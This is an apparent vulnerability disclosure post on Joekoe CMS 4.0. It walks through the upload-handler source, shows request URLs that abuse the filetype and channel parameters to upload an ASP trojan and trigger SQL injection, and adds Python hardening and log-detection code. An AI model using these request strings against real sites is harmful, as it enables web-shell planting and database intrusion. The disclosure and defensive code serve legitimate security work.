joekoe CMS 4.0 两个漏洞
<P>Two high-risk vulnerabilities in Joekoe (乔客) CMS 4.0<BR>A while ago I read through the Joekoe source and found two high-risk vulnerabilities in version 4.0: an upload vulnerability that lets you upload any file you like, ASP included, and a SQL injection that even returns the error message. Scary.</P>
<P>Upload vulnerability:<BR>Look at the code in /common/include/web.upload.asp</P>
<P>----------------------------------------------------------------------</P>
<P>sub doPageLoad()<BR>
if APP_STATUS="close" then<BR>
 treeData.addItem "_status","error.message"<BR>
 treeData.addItem "_message","网站暂时因关闭维护中!请稍候..."<BR>
 exit sub<BR>
end if<BR>
up.doInit()<BR>
if not upConfig.isInit then<BR>
 treeData.addItem "_status","error.message"<BR>
 treeData.addItem "_message","上传文件的参数不正确!"<BR>
else<BR>
 doPageLoadUser()<BR>
 select case upConfig.channel<BR>
 case "forum"<BR>
 upConfig.setSaveDir(upConfig.getSaveDir&(left(ops.time.toConvertString("",10),6)&DIR_SEPARATOR))<BR>
 upConfig.filename=""<BR>
 case "user.face"<BR>
 upConfig.filename="face_"&upConfig.userid<BR>
 upConfig.setSaveDir("face"&DIR_SEPARATOR)<BR>
 upConfig.filetype="gif"<BR>
 case "blog.logo"<BR>
 upConfig.setSaveDir("blog"&DIR_SEPARATOR)<BR>
 upConfig.filetype="gif"<BR>
 case else<BR>
 if instr(upConfig.channel,".")>0 then<BR>
 upConfig.setSaveDir(mid(upConfig.channel,1,instr(upConfig.channel,".")-1)&DIR_SEPARATOR)<BR>
 end if<BR>
 if instr(upConfig.fileinput,"url")>0 then<BR>
 upConfig.filetype="affix"<BR>
 end if<BR>
 end select<BR>
 if len(upConfig.getSaveDir())<3 then<BR>
 treeData.addItem "_status","error.message"<BR>
 treeData.addItem "_message","上传文件的参数不正确!"<BR>
 exit sub<BR>
 end if<BR>
<BR>
 if 1=1 then<BR>
 upConfig.setData "zoom.channel.width",120<BR>
 upConfig.setData "zoom.channel.height",90<BR>
 end if<BR>
<BR>
 upConfig.setBaseDir(DIR_ROOT&DIR_UPLOAD)<BR>
 upConfig.setBasePath(opsDirPath(DIR_ROOT&DIR_UPLOAD))<BR>
 upConfig.setBaseURL(URL_UPLOAD)<BR>
 up.doLoad()<BR>
end if<BR>
end sub</P>
<P>----------------------------------------------------------------------</P>
<P>This code uses channel to decide whether the upload type gets assigned at all. When channel is not forum, user.face or blog.logo, it only checks whether fileinput contains "url"; if it does not, upConfig.filetype is never assigned. Keep reading further down:</P>
<P>----------------------------------------------------------------------</P>
<P> if up.isPost() then<BR>
 call doParseUploadData()<BR>
 treeData.addItem "_status","succeed"<BR>
 dim tmpFormMode,tmpFileValue,tmpThumbValue<BR>
 tmpFormMode="set"<BR>
 if upConfig.channel="user.face" then<BR>
 tmpLinkMode="no"<BR>
 tmpFileValue="#"&up.getFileInfo("filename")<BR>
 else<BR>
 tmpFileValue=up.getFileInfo("file.path")<BR>
 select case upConfig.filetype<BR>
 case "file"<BR>
 tmpLinkMode="no"<BR>
 'tmpFileValue=up.getFileInfo("file.path")<BR>
 case "pic","spic","pics","affix","gif","jpg","jpeg","bmp","png"<BR>
 tmpLinkMode="no"<BR>
 tmpThumbValue=up.getFileInfo("thumb.path")<BR>
 case else<BR>
 tmpLinkMode="again"<BR>
 tmpFormMode="append"<BR>
 dim tmpFileType:tmpFileType=lcase(up.getFileInfo("filetype"))<BR>
 select case tmpFileType<BR>
 case "gif","jpg","jpeg","bmp","png"<BR>
 tmpFileValue=""<BR>
 case "swf"<BR>
 tmpFileValue=""<BR>
 case else<BR>
 tmpFileValue="upload_download.asp?id="&upConfig.fileid&""<BR>
 end select<BR>
 end select<BR>
 end if<BR>
 treeData.addItem "_form.mode",tmpFormMode<BR>
 treeData.addItem "_form.filevalue",tmpFileValue<BR>
 treeData.addItem "_form.thumbvalue",tmpThumbValue<BR>
 end if</P>
<P>----------------------------------------------------------------------</P>
<P>This code switches on upConfig.filetype and from that decides the extension of the uploaded file. As long as upConfig.filetype was left unassigned earlier and the type is not gif, jpg, jpeg, bmp, png or swf, it falls straight through to tmpFileValue="upload_download.asp?id="&upConfig.fileid&"". Anyone who reads this will have their eyes light up: the upload type is decided from what the user himself declares, which is like asking someone about to steal, "are you a thief?". This code is far too XX; I expect quite a few people had already spotted it and simply not made it public.</P>
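<P>To make the gap concrete, here is an added illustration (not Joekoe code): the filetype decision from doPageLoad() restated in Python, beside a hardened version in which the permitted extension comes from a server-side per-channel policy and the request's filetype parameter is never consulted. The CHANNEL_POLICY table, the extra "news" channel and the function names are assumptions.</P>

```python
import re

# Extensions web.upload.asp already treats as plain images
IMAGE_TYPES = {"gif", "jpg", "jpeg", "bmp", "png"}


def vulnerable_filetype(channel, fileinput, client_filetype):
    """Mirror of the select-case in doPageLoad(): only user.face and blog.logo
    force a type; forum and every unknown channel keep the request's own
    filetype unless fileinput contains "url"."""
    if channel in ("user.face", "blog.logo"):
        return "gif"
    if channel != "forum" and "url" in fileinput:
        return "affix"
    return client_filetype  # the gap: "asa" survives untouched


# Hardened variant (assumed policy table, not from the CMS): the channel must be
# known, and the extensions allowed for it come from the server side.
CHANNEL_POLICY = {
    "forum": IMAGE_TYPES | {"swf"},
    "user.face": {"gif"},
    "blog.logo": {"gif"},
    "news": IMAGE_TYPES,  # assumed extra channel for illustration
}
# One base name, one extension, no quotes or semicolons: the stored path later
# ends up in the u_url comparison, so it must stay a plain token.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]+\.[A-Za-z0-9]+$")


def hardened_filetype(channel, uploaded_filename):
    """Return the extension that will be stored, or raise ValueError."""
    allowed = CHANNEL_POLICY.get(channel)
    if allowed is None:
        raise ValueError("unknown upload channel")
    name = uploaded_filename.replace("\\", "/").rsplit("/", 1)[-1]
    if not SAFE_NAME.match(name):
        raise ValueError("file name is not a plain name.ext token")
    ext = name.rsplit(".", 1)[1].lower()
    if ext not in allowed:
        raise ValueError(f"extension {ext!r} not permitted for channel {channel!r}")
    return ext


def accepted(channel, uploaded_filename):
    """Boolean view of hardened_filetype for tests and log lines."""
    try:
        hardened_filetype(channel, uploaded_filename)
        return True
    except ValueError:
        return False
```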
<P>SQL injection vulnerability<BR>Again in web.upload.asp:</P>
<P>----------------------------------------------------------------------</P>
<P>...........<BR>
sub doParseUploadData()<BR>
dim tmpFilePath,tmpFileType,tmpFileSize,tmpName<BR>
tmpFilePath=up.getFileInfo("file.path")<BR>
tmpFileType=up.getFileInfo("filetype")<BR>
tmpFileSize=opsCommon.toInt(up.getFileInfo("filesize"))<BR>
tmpName=up.getFileInfo("name")<BR>
dim tmpChannel,tmpDataid,tmpType,tmpSQL,tmpID<BR>
tmpChannel=upConfig.channel<BR>
tmpDataid=0<BR>
tmpType=0<BR>
select case upConfig.channel<BR>
case "user.face"<BR>
 tmpDataid=upConfig.userid<BR>
 tmpChannel="face"<BR>
 tmpType=1<BR>
 tmpSQL="select top 1 u_id from db_sys_upload where nsort='"&tmpChannel&"' and iid="&tmpDataid&""<BR>
case "blog.logo"<BR>
 tmpDataid=toInt(ops.client.getSession("user.blogid"))<BR>
 if tmpDataid<1 then tmpDataid=upConfig.userid<BR>
 tmpChannel="blog"<BR>
 tmptype=1<BR>
 tmpSQL="select top 1 u_id from db_sys_upload where nsort='"&tmpChannel&"' and iid="&tmpDataid&""<BR>
case else<BR>
 tmpSQL="select top 1 u_id from db_sys_upload where u_url='"&tmpFilePath&"'"<BR>
end select<BR>
..........</P>
<P>----------------------------------------------------------------------</P>
<P>Look at this line: tmpSQL="select top 1 u_id from db_sys_upload where u_url='"&tmpFilePath&"'". u_url comes from tmpFilePath, and tmpFilePath comes from up.getFileInfo("file.path"); heh, it is dropped into the SQL query without any filtering whatsoever.</P>
<P> </P>
<P>Exploitation:<BR>1. Upload vulnerability: very easy to exploit. Change the channel variable so that it is not forum, user.face or blog.logo, then change filetype to asa, and you can upload an ASP trojan in plain sight. The URL can look like this: common/upload.asp?channel=use&filetype=asa&filename=&fileinput=u_face&formname=&thumbname=&thumbinput= , then upload.<BR>2. SQL injection: put a statement into the Channel variable, for example: common/upload.asp?channel=use'&filetype=gif&filename=&fileinput=u_face&formname=&thumbname=&thumbinput= , then upload and an error is returned:</P>
<P>----------------------------------------------------------------------</P>
<P>Joekoe CMS 4.0<BR>
错误信息:<BR>
select top 1 u_id from db_sys_upload where u_url='user'/20070722031234c.gif'<BR>
原始错误:<BR>
Error #-2147217900, 第 1 行: 'c' 附近有语法错误。 Microsoft OLE DB Provider for SQL Server<BR>
返回首页<BR>
Processed in 0.188 s, 1 queries, 54 Cache.</P>
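<P>From the defender's side, both request shapes quoted above are visible in the web server's access log. The following is an added example, not part of the original post: it scans IIS W3C log lines for requests to common/upload.asp whose filetype falls outside the image/swf set or whose channel carries characters that would reach the SQL string. The log lines are constructed, and the default field order in the #Fields header is an assumption of this parser.</P>

```python
import re
from urllib.parse import parse_qs

SAFE_TYPES = {"gif", "jpg", "jpeg", "bmp", "png", "swf"}  # types the upload code treats as harmless
KNOWN_CHANNELS = {"forum", "user.face", "blog.logo"}
# any other channel becomes a directory name and part of u_url: expect a plain dotted token
CHANNEL_RE = re.compile(r"^[a-z]+(\.[a-z]+)?$")

# Constructed IIS W3C log lines (assumed default field order, see #Fields).
# Lines 2 and 3 reuse the two request shapes quoted in the post above.
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2007-07-22 03:12:30 10.0.0.5 POST /common/upload.asp channel=user.face&filetype=gif&fileinput=u_face 80 - 198.51.100.7 Mozilla/4.0 200
2007-07-22 03:12:34 10.0.0.5 POST /common/upload.asp channel=use&filetype=asa&filename=&fileinput=u_face&formname=&thumbname=&thumbinput= 80 - 198.51.100.9 Mozilla/4.0 200
2007-07-22 03:12:41 10.0.0.5 POST /common/upload.asp channel=use%27&filetype=gif&filename=&fileinput=u_face&formname=&thumbname=&thumbinput= 80 - 198.51.100.9 Mozilla/4.0 500
2007-07-22 03:13:02 10.0.0.5 GET /index.asp - 80 - 198.51.100.3 Mozilla/4.0 200
""".splitlines()


def classify_upload_request(uri_stem, uri_query):
    """Reasons a request to the upload handler looks abusive; [] when it does not."""
    if not uri_stem.lower().endswith("/common/upload.asp"):
        return []
    qs = parse_qs(uri_query, keep_blank_values=True)
    channel = qs.get("channel", [""])[0]
    filetype = qs.get("filetype", [""])[0].lower()
    reasons = []
    if filetype and filetype not in SAFE_TYPES:
        reasons.append(f"filetype={filetype!r} outside the image/swf set")
    if channel not in KNOWN_CHANNELS and not CHANNEL_RE.match(channel):
        reasons.append(f"channel={channel!r} carries characters that reach the SQL string")
    return reasons


def scan_iis_log(lines):
    """Return (client_ip, status, reasons) for every suspicious upload request."""
    hits = []
    for line in lines:
        if not line or line.startswith("#"):
            continue
        f = line.split()
        query = "" if f[5] == "-" else f[5]
        reasons = classify_upload_request(f[4], query)
        if reasons:
            hits.append((f[8], f[10], reasons))
    return hits


if __name__ == "__main__":
    for ip, status, reasons in scan_iis_log(SAMPLE_LOG):
        print(ip, status, "; ".join(reasons))
```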
<P>*-------------------------</P>
<P>Tried it myself... the upload works without any problem...</P>
<P>The SQL part afterwards... seems to be of no use any more!! Try it yourself</P>